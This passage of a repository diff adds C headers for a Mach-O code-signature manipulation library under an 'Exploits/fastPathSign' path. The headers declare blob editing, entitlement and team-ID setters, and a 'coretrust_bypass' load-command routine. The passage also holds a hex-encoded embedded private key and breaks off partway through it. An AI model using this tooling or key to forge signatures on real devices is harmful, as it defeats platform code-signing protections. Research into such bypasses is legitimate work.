CSBLOB_DETACHED_SIGNATURE = 0xfade0cc1,
CSBLOB_ENTITLEMENTS = 0xfade7171,
CSBLOB_DER_ENTITLEMENTS = 0xfade7172,
CSBLOB_SIGNATURE_BLOB = 0xfade0b01
} CS_BlobType;
enum {
CSSLOT_CODEDIRECTORY = 0,
CSSLOT_INFOSLOT = 1,
CSSLOT_REQUIREMENTS = 2,
CSSLOT_RESOURCEDIR = 3,
CSSLOT_APPLICATION = 4,
CSSLOT_ENTITLEMENTS = 5,
CSSLOT_DER_ENTITLEMENTS = 7,
CSSLOT_ALTERNATE_CODEDIRECTORIES = 0x1000,
CSSLOT_ALTERNATE_CODEDIRECTORY_MAX = 5,
CSSLOT_ALTERNATE_CODEDIRECTORY_LIMIT = CSSLOT_ALTERNATE_CODEDIRECTORIES + CSSLOT_ALTERNATE_CODEDIRECTORY_MAX,
CSSLOT_SIGNATURESLOT = 0x10000
} CS_SlotType;
typedef struct s_CS_DecodedBlob {
struct s_CS_DecodedBlob *next;
uint32_t type;
MemoryStream *stream;
} CS_DecodedBlob;
typedef struct s_CS_DecodedSuperBlob {
uint32_t magic;
struct s_CS_DecodedBlob *firstBlob;
} CS_DecodedSuperBlob;
// Convert blob magic to readable blob type string
char *cs_blob_magic_to_string(int magic);
// Extract Code Signature to file
int macho_extract_cs_to_file(MachO *macho, CS_SuperBlob *superblob);
void macho_find_code_signature_bounds(MachO *macho, uint32_t *offsetOut, uint32_t *sizeOut);
CS_SuperBlob *macho_read_code_signature(MachO *macho);
int macho_replace_code_signature(MachO *macho, CS_SuperBlob *superblob);
int update_load_commands(MachO *macho, CS_SuperBlob *superblob, uint64_t originalSize);
CS_DecodedBlob *csd_blob_init(uint32_t type, CS_GenericBlob *blobData);
int csd_blob_read(CS_DecodedBlob *blob, uint64_t offset, size_t size, void *outBuf);
int csd_blob_write(CS_DecodedBlob *blob, uint64_t offset, size_t size, const void *inBuf);
int csd_blob_insert(CS_DecodedBlob *blob, uint64_t offset, size_t size, const void *inBuf);
int csd_blob_delete(CS_DecodedBlob *blob, uint64_t offset, size_t size);
int csd_blob_read_string(CS_DecodedBlob *blob, uint64_t offset, char **outString);
int csd_blob_write_string(CS_DecodedBlob *blob, uint64_t offset, const char *string);
int csd_blob_get_size(CS_DecodedBlob *blob);
uint32_t csd_blob_get_type(CS_DecodedBlob *blob);
void csd_blob_set_type(CS_DecodedBlob *blob, uint32_t type);
void csd_blob_free(CS_DecodedBlob *blob);
CS_DecodedSuperBlob *csd_superblob_decode(CS_SuperBlob *superblob);
CS_SuperBlob *csd_superblob_encode(CS_DecodedSuperBlob *decodedSuperblob);
CS_DecodedBlob *csd_superblob_find_blob(CS_DecodedSuperBlob *superblob, uint32_t type, uint32_t *indexOut);
int csd_superblob_insert_blob_after_blob(CS_DecodedSuperBlob *superblob, CS_DecodedBlob *blobToInsert, CS_DecodedBlob *afterBlob);
int csd_superblob_insert_blob_at_index(CS_DecodedSuperBlob *superblob, CS_DecodedBlob *blobToInsert, uint32_t atIndex);
int csd_superblob_append_blob(CS_DecodedSuperBlob *superblob, CS_DecodedBlob *blobToAppend);
int csd_superblob_remove_blob(CS_DecodedSuperBlob *superblob, CS_DecodedBlob *blobToRemove); // <- Important: When calling this, caller is responsible for freeing blobToRemove
int csd_superblob_remove_blob_at_index(CS_DecodedSuperBlob *superblob, uint32_t atIndex);
int csd_superblob_print_content(CS_DecodedSuperBlob *decodedSuperblob, MachO *macho, bool printAllSlots, bool verifySlots);
void csd_superblob_free(CS_DecodedSuperBlob *decodedSuperblob);
#endif // CS_BLOB_H

53
Exploits/fastPathSign/src/external/include/choma/CodeDirectory.h vendored Normal file
View File

@ -0,0 +1,53 @@
#ifndef CODE_DIRECTORY_H
#define CODE_DIRECTORY_H
#include <stdint.h>
#include <math.h>
#include <CommonCrypto/CommonDigest.h>
#include "MachO.h"
#include "CSBlob.h"
#include "FAT.h"
#include "MachOByteOrder.h"
#include "MachOLoadCommand.h"
#include "MemoryStream.h"
// Code directory blob header
typedef struct __CodeDirectory {
uint32_t magic;
uint32_t length;
uint32_t version;
uint32_t flags;
uint32_t hashOffset;
uint32_t identOffset;
uint32_t nSpecialSlots;
uint32_t nCodeSlots;
uint32_t codeLimit;
uint8_t hashSize;
uint8_t hashType;
uint8_t spare1;
uint8_t pageSize;
uint32_t spare2;
uint32_t scatterOffset;
uint32_t teamOffset;
} CS_CodeDirectory;
enum CS_HashType {
CS_HASHTYPE_SHA160_160 = 1,
CS_HASHTYPE_SHA256_256 = 2,
CS_HASHTYPE_SHA256_160 = 3,
CS_HASHTYPE_SHA384_384 = 4,
};
char *csd_code_directory_copy_identity(CS_DecodedBlob *codeDirBlob, uint32_t *offsetOut);
char *csd_code_directory_copy_team_id(CS_DecodedBlob *codeDirBlob, uint32_t *offsetOut);
int csd_code_directory_set_team_id(CS_DecodedBlob *codeDirBlob, char *newTeamID);
uint32_t csd_code_directory_get_flags(CS_DecodedBlob *codeDirBlob);
void csd_code_directory_set_flags(CS_DecodedBlob *codeDirBlob, uint32_t flags);
uint32_t csd_code_directory_get_hash_type(CS_DecodedBlob *codeDirBlob);
void csd_code_directory_set_hash_type(CS_DecodedBlob *codeDirBlob, uint32_t hashType);
int csd_code_directory_print_content(CS_DecodedBlob *codeDirBlob, MachO *macho, bool printSlots, bool verifySlots);
void csd_code_directory_update(CS_DecodedBlob *codeDirBlob, MachO *macho);
#endif // CODE_DIRECTORY_H

41
Exploits/fastPathSign/src/external/include/choma/FAT.h vendored Normal file
View File

@ -0,0 +1,41 @@
#ifndef MACHO_H
#define MACHO_H
#include <stdio.h>
#include <libkern/OSByteOrder.h>
#include <mach/mach.h>
#include <mach-o/loader.h>
#include <mach-o/fat.h>
#include <sys/stat.h>
#include "MemoryStream.h"
typedef struct MachO MachO;
// A FAT structure can either represent a FAT file with multiple slices, in which the slices will be loaded into the slices attribute
// Or a single slice MachO, in which case it serves as a compatibility layer and the single slice will also be loaded into the slices attribute
typedef struct FAT
{
MemoryStream *stream;
MachO **slices;
uint32_t slicesCount;
int fileDescriptor;
} FAT;
int fat_read_at_offset(FAT *fat, uint64_t offset, size_t size, void *outBuf);
MemoryStream *fat_get_stream(FAT *fat);
// Initialise a FAT structure from a memory stream
FAT *fat_init_from_memory_stream(MemoryStream *stream);
// Initialise a FAT structure using the path to the file
FAT *fat_init_from_path(const char *filePath);
//FAT *fat_init_from_path_for_writing(const char *filePath);
// Find macho with cputype and cpusubtype in FAT, returns NULL if not found
MachO *fat_find_slice(FAT *fat, cpu_type_t cputype, cpu_subtype_t cpusubtype);
// Free all elements of the FAT structure
void fat_free(FAT *fat);
#endif // MACHO_H

21
Exploits/fastPathSign/src/external/include/choma/FileStream.h vendored Normal file
View File

@ -0,0 +1,21 @@
#ifndef FILE_STREAM_H
#define FILE_STREAM_H
#include "MemoryStream.h"
#define FILE_STREAM_SIZE_AUTO 0
#define FILE_STREAM_FLAG_WRITABLE (1 << 0)
#define FILE_STREAM_FLAG_AUTO_EXPAND (1 << 1)
typedef struct FileStreamContext {
int fd;
size_t fileSize;
uint32_t bufferStart;
size_t bufferSize;
} FileStreamContext;
MemoryStream *file_stream_init_from_file_descriptor_nodup(int fd, uint32_t bufferStart, size_t bufferSize, uint32_t flags);
MemoryStream *file_stream_init_from_file_descriptor(int fd, uint32_t bufferStart, size_t bufferSize, uint32_t flags);
MemoryStream *file_stream_init_from_path(const char *path, uint32_t bufferStart, size_t bufferSize, uint32_t flags);
#endif // FILE_STREAM_H

10
Exploits/fastPathSign/src/external/include/choma/Host.h vendored Normal file
View File

@ -0,0 +1,10 @@
#ifndef HOST_H
#define HOST_H
#include "FAT.h"
// Retrieve the preferred MachO slice from a FAT
// Preferred slice as in the slice that the kernel would use when loading the file
MachO *fat_find_preferred_slice(FAT *fat);
#endif // HOST_H

62
Exploits/fastPathSign/src/external/include/choma/MachO.h vendored Normal file
View File

@ -0,0 +1,62 @@
#ifndef MACHO_SLICE_H
#define MACHO_SLICE_H
#include <stdbool.h>
#include <mach-o/fat.h>
#include <mach-o/loader.h>
#include "MemoryStream.h"
#include "FAT.h"
typedef struct MachOSegment
{
struct segment_command_64 command;
struct section_64 sections[];
} __attribute__((__packed__)) MachOSegment;
typedef struct FilesetMachO {
char *entry_id;
uint64_t vmaddr;
uint64_t fileoff;
FAT *underlyingMachO;
} FilesetMachO;
typedef struct MachO {
MemoryStream *stream;
bool isSupported;
struct mach_header_64 machHeader;
struct fat_arch_64 archDescriptor;
uint32_t filesetCount;
FilesetMachO *filesetMachos;
uint32_t segmentCount;
MachOSegment **segments;
} MachO;
// Read data from a MachO at a specified offset
int macho_read_at_offset(MachO *macho, uint64_t offset, size_t size, void *outBuf);
// Write data from a MachO at a specified offset, auto expands, only works if opened via macho_init_for_writing
int macho_write_at_offset(MachO *macho, uint64_t offset, size_t size, void *inBuf);
MemoryStream *macho_get_stream(MachO *macho);
uint32_t macho_get_filetype(MachO *macho);
// Perform translation between file offsets and virtual addresses
int macho_translate_fileoff_to_vmaddr(MachO *macho, uint64_t fileoff, uint64_t *vmaddrOut, MachOSegment **segmentOut);
int macho_translate_vmaddr_to_fileoff(MachO *macho, uint64_t vmaddr, uint64_t *fileoffOut, MachOSegment **segmentOut);
// Read data from a MachO at a specified virtual address
int macho_read_at_vmaddr(MachO *macho, uint64_t vmaddr, size_t size, void *outBuf);
int macho_enumerate_load_commands(MachO *macho, void (^enumeratorBlock)(struct load_command loadCommand, uint64_t offset, void *cmd, bool *stop));
// Initialise a MachO object from a MemoryStream and it's corresponding FAT arch descriptor
MachO *macho_init(MemoryStream *stream, struct fat_arch_64 archDescriptor);
// Initialize a single slice macho for writing to it
MachO *macho_init_for_writing(const char *filePath);
void macho_free(MachO *macho);
#endif // MACHO_SLICE_H

164
Exploits/fastPathSign/src/external/include/choma/MachOByteOrder.h vendored Normal file
View File

@ -0,0 +1,164 @@
#ifndef MACHO_BYTE_ORDER_H
#define MACHO_BYTE_ORDER_H
#include <stdio.h>
#include <stdlib.h>
// 8-bit integers needed for CodeDirectory
#define BIG_TO_HOST(n) _Generic((n), \
int8_t: n, \
uint8_t: n, \
int16_t: OSSwapBigToHostInt16(n), \
uint16_t: OSSwapBigToHostInt16(n), \
int32_t: OSSwapBigToHostInt32(n), \
uint32_t: OSSwapBigToHostInt32(n), \
int64_t: OSSwapBigToHostInt64(n), \
uint64_t: OSSwapBigToHostInt64(n) \
)
#define HOST_TO_BIG(n) _Generic((n), \
int8_t: n, \
uint8_t: n, \
uint16_t: OSSwapHostToBigInt16(n), \
int16_t: OSSwapHostToBigInt16(n), \
int32_t: OSSwapHostToBigInt32(n), \
uint32_t: OSSwapHostToBigInt32(n), \
int64_t: OSSwapHostToBigInt64(n), \
uint64_t: OSSwapHostToBigInt64(n) \
)
#define LITTLE_TO_HOST(n) _Generic((n), \
int8_t: n, \
uint8_t: n, \
int16_t: OSSwapLittleToHostInt16(n), \
uint16_t: OSSwapLittleToHostInt16(n), \
int32_t: OSSwapLittleToHostInt32(n), \
uint32_t: OSSwapLittleToHostInt32(n), \
int64_t: OSSwapLittleToHostInt64(n), \
uint64_t: OSSwapLittleToHostInt64(n) \
)
#define HOST_TO_LITTLE(n) _Generic((n), \
int8_t: n, \
uint8_t: n, \
int16_t: OSSwapHostToLittleInt16(n), \
uint16_t: OSSwapHostToLittleInt16(n), \
int32_t: OSSwapHostToLittleInt32(n), \
uint32_t: OSSwapHostToLittleInt32(n), \
int64_t: OSSwapHostToLittleInt64(n), \
uint64_t: OSSwapHostToLittleInt64(n) \
)
#define HOST_TO_LITTLE_APPLIER(instance, member) \
(instance)->member = HOST_TO_LITTLE((instance)->member)
#define HOST_TO_BIG_APPLIER(instance, member) \
(instance)->member = HOST_TO_BIG((instance)->member)
#define LITTLE_TO_HOST_APPLIER(instance, member) \
(instance)->member = LITTLE_TO_HOST((instance)->member)
#define BIG_TO_HOST_APPLIER(instance, member) \
(instance)->member = BIG_TO_HOST((instance)->member)
#define FAT_HEADER_APPLY_BYTE_ORDER(fh, applier) \
applier(fh, magic); \
applier(fh, nfat_arch);
#define FAT_ARCH_APPLY_BYTE_ORDER(arch, applier) \
applier(arch, cputype); \
applier(arch, cpusubtype); \
applier(arch, offset); \
applier(arch, size); \
applier(arch, align); \
#define FAT_ARCH_64_APPLY_BYTE_ORDER(arch, applier) \
applier(arch, cputype); \
applier(arch, cpusubtype); \
applier(arch, offset); \
applier(arch, size); \
applier(arch, align); \
applier(arch, reserved); \
#define MACH_HEADER_APPLY_BYTE_ORDER(mh, applier) \
applier(mh, magic); \
applier(mh, cputype); \
applier(mh, cpusubtype); \
applier(mh, filetype); \
applier(mh, ncmds); \
applier(mh, sizeofcmds); \
applier(mh, reserved);
#define LOAD_COMMAND_APPLY_BYTE_ORDER(lc, applier) \
applier(lc, cmd); \
applier(lc, cmdsize);
#define LINKEDIT_DATA_COMMAND_APPLY_BYTE_ORDER(lc, applier) \
applier(lc, cmd); \
applier(lc, cmdsize); \
applier(lc, dataoff); \
applier(lc, datasize);
#define BLOB_INDEX_APPLY_BYTE_ORDER(bi, applier) \
applier(bi, type); \
applier(bi, offset);
#define SUPERBLOB_APPLY_BYTE_ORDER(sb, applier) \
applier(sb, magic); \
applier(sb, length); \
applier(sb, count);
#define GENERIC_BLOB_APPLY_BYTE_ORDER(gb, applier) \
applier(gb, magic); \
applier(gb, length);
#define CODE_DIRECTORY_APPLY_BYTE_ORDER(cd, applier) \
applier(cd, magic); \
applier(cd, length); \
applier(cd, version); \
applier(cd, flags); \
applier(cd, hashOffset); \
applier(cd, identOffset); \
applier(cd, nSpecialSlots); \
applier(cd, nCodeSlots); \
applier(cd, codeLimit); \
applier(cd, hashSize); \
applier(cd, hashType); \
applier(cd, spare1); \
applier(cd, pageSize); \
applier(cd, spare2); \
applier(cd, scatterOffset); \
applier(cd, teamOffset);
#define SEGMENT_COMMAND_64_APPLY_BYTE_ORDER(sc64, applier) \
applier(sc64, cmd); \
applier(sc64, cmdsize); \
applier(sc64, fileoff); \
applier(sc64, filesize); \
applier(sc64, vmaddr); \
applier(sc64, vmsize); \
applier(sc64, flags); \
applier(sc64, initprot); \
applier(sc64, maxprot); \
applier(sc64, nsects);
#define SECTION_64_APPLY_BYTE_ORDER(sc64, applier) \
applier(sc64, addr); \
applier(sc64, align); \
applier(sc64, flags); \
applier(sc64, nreloc); \
applier(sc64, offset); \
applier(sc64, reserved1); \
applier(sc64, reserved2); \
applier(sc64, reserved3); \
applier(sc64, size);
#define FILESET_ENTRY_COMMAND_APPLY_BYTE_ORDER(fse, applier) \
applier(fse, cmd); \
applier(fse, cmdsize); \
applier(fse, vmaddr); \
applier(fse, fileoff); \
applier(fse, entry_id.offset); \
applier(fse, reserved); \
#endif // MACHO_BYTE_ORDER_H

16
Exploits/fastPathSign/src/external/include/choma/MachOLoadCommand.h vendored Normal file
View File

@ -0,0 +1,16 @@
#ifndef MACHO_LOAD_COMMAND_H
#define MACHO_LOAD_COMMAND_H
#include <mach-o/loader.h>
#include "MachO.h"
#include "CSBlob.h"
#include "FileStream.h"
#include "MachOByteOrder.h"
// Convert load command to load command name
char *load_command_to_string(int loadCommand);
void update_segment_command_64(MachO *macho, const char *segmentName, uint64_t vmaddr, uint64_t vmsize, uint64_t fileoff, uint64_t filesize);
void update_lc_code_signature(MachO *macho, uint64_t size);
int update_load_commands_for_coretrust_bypass(MachO *macho, CS_SuperBlob *superblob, uint64_t originalCodeSignatureSize, uint64_t originalMachOSize);
#endif // MACHO_LOAD_COMMAND_H

60
Exploits/fastPathSign/src/external/include/choma/MemoryStream.h vendored Normal file
View File

@ -0,0 +1,60 @@
#ifndef MEMORY_STREAM_H
#define MEMORY_STREAM_H
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <string.h>
#include <unistd.h>
#include <stdbool.h>
#define MEMORY_STREAM_FLAG_OWNS_DATA (1 << 0)
#define MEMORY_STREAM_FLAG_MUTABLE (1 << 1)
#define MEMORY_STREAM_FLAG_AUTO_EXPAND (1 << 2)
#define MEMORY_STREAM_SIZE_INVALID (size_t)-1
// A generic memory IO interface that is used throughout this project
// Can be backed by anything, just the functions have to be implemented
typedef struct s_MemoryStream {
void *context;
uint32_t flags;
int (*read)(struct s_MemoryStream *stream, uint64_t offset, size_t size, void *outBuf);
int (*write)(struct s_MemoryStream *stream, uint64_t offset, size_t size, const void *inBuf);
int (*getSize)(struct s_MemoryStream *stream, size_t *sizeOut);
uint8_t *(*getRawPtr)(struct s_MemoryStream *stream);
int (*trim)(struct s_MemoryStream *stream, size_t trimAtStart, size_t trimAtEnd);
int (*expand)(struct s_MemoryStream *stream, size_t expandAtStart, size_t expandAtEnd);
struct s_MemoryStream *(*hardclone)(struct s_MemoryStream *stream);
struct s_MemoryStream *(*softclone)(struct s_MemoryStream *stream);
void (*free)(struct s_MemoryStream *stream);
} MemoryStream;
int memory_stream_read(MemoryStream *stream, uint64_t offset, size_t size, void *outBuf);
int memory_stream_write(MemoryStream *stream, uint64_t offset, size_t size, const void *inBuf);
int memory_stream_insert(MemoryStream *stream, uint64_t offset, size_t size, const void *inBuf);
int memory_stream_delete(MemoryStream *stream, uint64_t offset, size_t size);
int memory_stream_read_string(MemoryStream *stream, uint64_t offset, char **outString);
int memory_stream_write_string(MemoryStream *stream, uint64_t offset, const char *string);
size_t memory_stream_get_size(MemoryStream *stream);
uint8_t *memory_stream_get_raw_pointer(MemoryStream *stream);
uint32_t memory_stream_get_flags(MemoryStream *stream);
MemoryStream *memory_stream_softclone(MemoryStream *stream);
MemoryStream *memory_stream_hardclone(MemoryStream *stream);
int memory_stream_trim(MemoryStream *stream, size_t trimAtStart, size_t trimAtEnd);
int memory_stream_expand(MemoryStream *stream, size_t expandAtStart, size_t expandAtEnd);
void memory_stream_free(MemoryStream *stream);
int memory_stream_copy_data(MemoryStream *originStream, uint64_t originOffset, MemoryStream *targetStream, uint64_t targetOffset, size_t size);
int memory_stream_find_memory(MemoryStream *stream, uint64_t searchOffset, size_t searchSize, void *bytes, void *mask, size_t nbytes, uint16_t alignment, uint64_t *foundOffsetOut);
#endif // MEMORY_STREAM_H

44
Exploits/fastPathSign/src/external/include/choma/PatchFinder.h vendored Normal file
View File

@ -0,0 +1,44 @@
#include <stdint.h>
#include "MachO.h"
#define METRIC_TYPE_PATTERN 1
#define METRIC_TYPE_STRING_XREF 2
#define METRIC_TYPE_FUNCTION_XREF 3
typedef struct PFSection {
uint64_t fileoff;
uint64_t vmaddr;
uint64_t size;
uint8_t *cache;
bool ownsCache;
} PFSection;
PFSection *macho_patchfinder_create_section(MachO *macho, const char *filesetEntryId, const char *segName, const char *sectName);
int macho_patchfinder_cache_section(PFSection *section, MachO *fromMacho);
void macho_patchfinder_section_free(PFSection *section);
typedef struct MetricShared {
uint32_t type;
PFSection *section;
} MetricShared;
typedef enum {
BYTE_PATTERN_ALIGN_8_BIT,
BYTE_PATTERN_ALIGN_16_BIT,
BYTE_PATTERN_ALIGN_32_BIT,
BYTE_PATTERN_ALIGN_64_BIT,
} BytePatternAlignment;
typedef struct BytePatternMetric {
MetricShared shared;
void *bytes;
void *mask;
size_t nbytes;
BytePatternAlignment alignment;
} BytePatternMetric;
BytePatternMetric *macho_patchfinder_create_byte_pattern_metric(PFSection *section, void *bytes, void *mask, size_t nbytes, BytePatternAlignment alignment);
void macho_patchfinder_run_metric(MachO *macho, void *metric, void (^matchBlock)(uint64_t vmaddr, bool *stop));

145
Exploits/fastPathSign/src/external/include/choma/PrivateKey.h vendored Normal file
View File

@ -0,0 +1,145 @@
unsigned char ca_key[] = {
0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x42, 0x45, 0x47, 0x49, 0x4e, 0x20, 0x50,
0x52, 0x49, 0x56, 0x41, 0x54, 0x45, 0x20, 0x4b, 0x45, 0x59, 0x2d, 0x2d,
0x2d, 0x2d, 0x2d, 0x0a, 0x4d, 0x49, 0x49, 0x45, 0x76, 0x51, 0x49, 0x42,
0x41, 0x44, 0x41, 0x4e, 0x42, 0x67, 0x6b, 0x71, 0x68, 0x6b, 0x69, 0x47,
0x39, 0x77, 0x30, 0x42, 0x41, 0x51, 0x45, 0x46, 0x41, 0x41, 0x53, 0x43,
0x42, 0x4b, 0x63, 0x77, 0x67, 0x67, 0x53, 0x6a, 0x41, 0x67, 0x45, 0x41,
0x41, 0x6f, 0x49, 0x42, 0x41, 0x51, 0x43, 0x78, 0x72, 0x46, 0x54, 0x32,
0x5a, 0x2f, 0x5a, 0x31, 0x47, 0x76, 0x32, 0x55, 0x0a, 0x43, 0x58, 0x53,
0x2f, 0x62, 0x61, 0x61, 0x6c, 0x57, 0x63, 0x52, 0x62, 0x4d, 0x43, 0x39,
0x69, 0x49, 0x62, 0x4b, 0x6a, 0x7a, 0x51, 0x7a, 0x67, 0x41, 0x72, 0x70,
0x67, 0x55, 0x2b, 0x56, 0x30, 0x42, 0x64, 0x58, 0x30, 0x48, 0x32, 0x48,
0x6e, 0x56, 0x52, 0x61, 0x45, 0x33, 0x65, 0x7a, 0x4c, 0x7a, 0x72, 0x70,
0x59, 0x4c, 0x77, 0x65, 0x6e, 0x31, 0x79, 0x66, 0x39, 0x5a, 0x4f, 0x71,
0x73, 0x0a, 0x77, 0x2b, 0x65, 0x67, 0x59, 0x34, 0x5a, 0x54, 0x50, 0x74,
0x77, 0x50, 0x39, 0x4d, 0x6d, 0x70, 0x6c, 0x4c, 0x43, 0x75, 0x6f, 0x59,
0x41, 0x69, 0x6f, 0x6c, 0x72, 0x69, 0x77, 0x31, 0x32, 0x63, 0x70, 0x6b,
0x44, 0x6c, 0x62, 0x70, 0x55, 0x4a, 0x61, 0x68, 0x38, 0x59, 0x31, 0x56,
0x67, 0x45, 0x37, 0x6a, 0x4a, 0x47, 0x64, 0x61, 0x5a, 0x76, 0x48, 0x48,
0x4f, 0x37, 0x71, 0x44, 0x64, 0x50, 0x0a, 0x38, 0x48, 0x54, 0x50, 0x46,
0x65, 0x36, 0x48, 0x71, 0x50, 0x75, 0x43, 0x37, 0x5a, 0x6a, 0x50, 0x39,
0x4e, 0x6e, 0x45, 0x64, 0x50, 0x56, 0x4c, 0x48, 0x30, 0x4b, 0x6d, 0x6c,
0x2f, 0x54, 0x64, 0x49, 0x71, 0x34, 0x61, 0x71, 0x34, 0x30, 0x73, 0x4f,
0x78, 0x75, 0x32, 0x56, 0x36, 0x72, 0x78, 0x4c, 0x68, 0x7a, 0x44, 0x72,
0x52, 0x56, 0x76, 0x35, 0x4b, 0x43, 0x7a, 0x4c, 0x43, 0x44, 0x4c, 0x0a,
0x47, 0x64, 0x36, 0x51, 0x72, 0x6c, 0x4f, 0x68, 0x51, 0x33, 0x77, 0x69,
0x68, 0x79, 0x2b, 0x54, 0x2b, 0x69, 0x4d, 0x68, 0x4a, 0x75, 0x76, 0x54,
0x41, 0x46, 0x51, 0x6b, 0x72, 0x69, 0x66, 0x78, 0x33, 0x34, 0x67, 0x50,
0x64, 0x61, 0x6a, 0x68, 0x41, 0x6b, 0x49, 0x55, 0x56, 0x36, 0x49, 0x59,
0x54, 0x36, 0x48, 0x54, 0x33, 0x4a, 0x47, 0x64, 0x57, 0x71, 0x68, 0x39,
0x53, 0x71, 0x32, 0x44, 0x0a, 0x54, 0x73, 0x79, 0x75, 0x72, 0x36, 0x6d,
0x5a, 0x72, 0x75, 0x33, 0x73, 0x32, 0x70, 0x32, 0x78, 0x2b, 0x31, 0x65,
0x79, 0x57, 0x63, 0x63, 0x67, 0x41, 0x39, 0x34, 0x57, 0x58, 0x2f, 0x41,
0x57, 0x38, 0x72, 0x37, 0x56, 0x36, 0x47, 0x51, 0x4e, 0x4b, 0x78, 0x75,
0x61, 0x38, 0x6f, 0x39, 0x75, 0x74, 0x69, 0x51, 0x4c, 0x30, 0x78, 0x79,
0x56, 0x37, 0x79, 0x74, 0x2f, 0x30, 0x72, 0x69, 0x42, 0x0a, 0x67, 0x51,
0x64, 0x57, 0x71, 0x77, 0x65, 0x35, 0x41, 0x67, 0x4d, 0x42, 0x41, 0x41,
0x45, 0x43, 0x67, 0x67, 0x45, 0x41, 0x42, 0x64, 0x55, 0x78, 0x2f, 0x74,
0x72, 0x66, 0x34, 0x4f, 0x31, 0x50, 0x61, 0x4e, 0x59, 0x38, 0x6f, 0x6e,
0x49, 0x76, 0x6c, 0x39, 0x73, 0x51, 0x45, 0x71, 0x78, 0x4d, 0x79, 0x65,
0x78, 0x77, 0x53, 0x47, 0x64, 0x5a, 0x5a, 0x6c, 0x74, 0x41, 0x6b, 0x68,
0x76, 0x2b, 0x0a, 0x2b, 0x75, 0x57, 0x63, 0x4a, 0x67, 0x55, 0x48, 0x75,
0x6b, 0x66, 0x31, 0x55, 0x73, 0x78, 0x55, 0x55, 0x30, 0x61, 0x49, 0x6f,
0x49, 0x39, 0x2b, 0x73, 0x56, 0x68, 0x6a, 0x5a, 0x44, 0x4b, 0x31, 0x62,
0x35, 0x47, 0x49, 0x33, 0x35, 0x2b, 0x55, 0x7a, 0x39, 0x50, 0x4f, 0x39,
0x71, 0x6b, 0x6a, 0x47, 0x37, 0x47, 0x5a, 0x63, 0x55, 0x6f, 0x31, 0x41,
0x69, 0x34, 0x52, 0x54, 0x4d, 0x4e, 0x38, 0x0a, 0x4a, 0x63, 0x48, 0x68,
0x66, 0x49, 0x61, 0x36, 0x56, 0x74, 0x4a, 0x49, 0x6a, 0x68, 0x43, 0x6d,
0x38, 0x4a, 0x5a, 0x2f, 0x53, 0x51, 0x66, 0x67, 0x76, 0x47, 0x49, 0x54,
0x50, 0x4a, 0x52, 0x6a, 0x71, 0x48, 0x69, 0x73, 0x35, 0x51, 0x57, 0x44,
0x7a, 0x4b, 0x6c, 0x55, 0x42, 0x48, 0x4c, 0x58, 0x59, 0x76, 0x42, 0x58,
0x57, 0x39, 0x63, 0x35, 0x48, 0x45, 0x75, 0x38, 0x37, 0x4f, 0x6f, 0x66,
0x0a, 0x48, 0x79, 0x56, 0x6b, 0x52, 0x43, 0x36, 0x66, 0x39, 0x45, 0x37,
0x38, 0x75, 0x4d, 0x69, 0x51, 0x4c, 0x51, 0x6b, 0x76, 0x67, 0x45, 0x49,
0x74, 0x52, 0x36, 0x67, 0x30, 0x73, 0x6e, 0x53, 0x37, 0x36, 0x44, 0x71,
0x47, 0x6c, 0x78, 0x75, 0x2f, 0x47, 0x52, 0x42, 0x47, 0x50, 0x54, 0x54,
0x44, 0x45, 0x51, 0x33, 0x4e, 0x59, 0x39, 0x4b, 0x62, 0x70, 0x4f, 0x66,
0x30, 0x33, 0x36, 0x67, 0x58, 0x0a, 0x62, 0x66, 0x7a, 0x74, 0x66, 0x63,
0x67, 0x54, 0x2b, 0x6d, 0x35, 0x50, 0x41, 0x54, 0x4c, 0x39, 0x38, 0x6c,
0x6f, 0x58, 0x4e, 0x67, 0x4f, 0x34, 0x69, 0x4b, 0x76, 0x71, 0x47, 0x79,
0x4b, 0x77, 0x39, 0x46, 0x53, 0x4f, 0x44, 0x31, 0x53, 0x75, 0x48, 0x72,
0x56, 0x49, 0x6e, 0x7a, 0x49, 0x36, 0x59, 0x63, 0x37, 0x5a, 0x68, 0x4d,
0x64, 0x2f, 0x52, 0x74, 0x4f, 0x38, 0x37, 0x79, 0x45, 0x78, 0x0a, 0x2b,
0x48, 0x68, 0x6a, 0x67, 0x66, 0x7a, 0x74, 0x6b, 0x4d, 0x39, 0x62, 0x41,
0x30, 0x58, 0x4a, 0x5a, 0x43, 0x7a, 0x46, 0x34, 0x54, 0x41, 0x71, 0x6a,
0x55, 0x51, 0x31, 0x6e, 0x4a, 0x61, 0x33, 0x33, 0x59, 0x31, 0x39, 0x55,
0x38, 0x38, 0x41, 0x77, 0x51, 0x4b, 0x42, 0x67, 0x51, 0x44, 0x6e, 0x75,
0x37, 0x48, 0x73, 0x58, 0x37, 0x50, 0x64, 0x75, 0x2b, 0x4e, 0x33, 0x4d,
0x71, 0x46, 0x65, 0x0a, 0x75, 0x6c, 0x62, 0x58, 0x44, 0x58, 0x65, 0x34,
0x64, 0x55, 0x55, 0x67, 0x6c, 0x33, 0x64, 0x43, 0x53, 0x58, 0x58, 0x74,
0x4e, 0x71, 0x6b, 0x57, 0x66, 0x7a, 0x6e, 0x54, 0x6c, 0x62, 0x31, 0x74,
0x79, 0x52, 0x2b, 0x62, 0x55, 0x6b, 0x51, 0x49, 0x34, 0x6d, 0x5a, 0x51,
0x77, 0x67, 0x6b, 0x67, 0x52, 0x4b, 0x64, 0x41, 0x31, 0x65, 0x59, 0x52,
0x53, 0x5a, 0x47, 0x4b, 0x4d, 0x65, 0x75, 0x74, 0x0a, 0x77, 0x6f, 0x56,
0x62, 0x62, 0x64, 0x42, 0x45, 0x4e, 0x69, 0x77, 0x69, 0x39, 0x32, 0x52,
0x38, 0x67, 0x71, 0x65, 0x78, 0x32, 0x48, 0x52, 0x56, 0x4b, 0x52, 0x6f,
0x36, 0x53, 0x66, 0x75, 0x4c, 0x49, 0x46, 0x59, 0x4f, 0x6c, 0x35, 0x4f,
0x58, 0x2f, 0x61, 0x51, 0x4a, 0x55, 0x72, 0x34, 0x49, 0x45, 0x46, 0x6d,
0x69, 0x51, 0x2f, 0x30, 0x59, 0x32, 0x2b, 0x39, 0x47, 0x36, 0x36, 0x71,
0x79, 0x0a, 0x77, 0x46, 0x63, 0x34, 0x6f, 0x54, 0x39, 0x64, 0x2b, 0x65,
0x63, 0x50, 0x4c, 0x67, 0x43, 0x46, 0x54, 0x51, 0x36, 0x64, 0x79, 0x46,
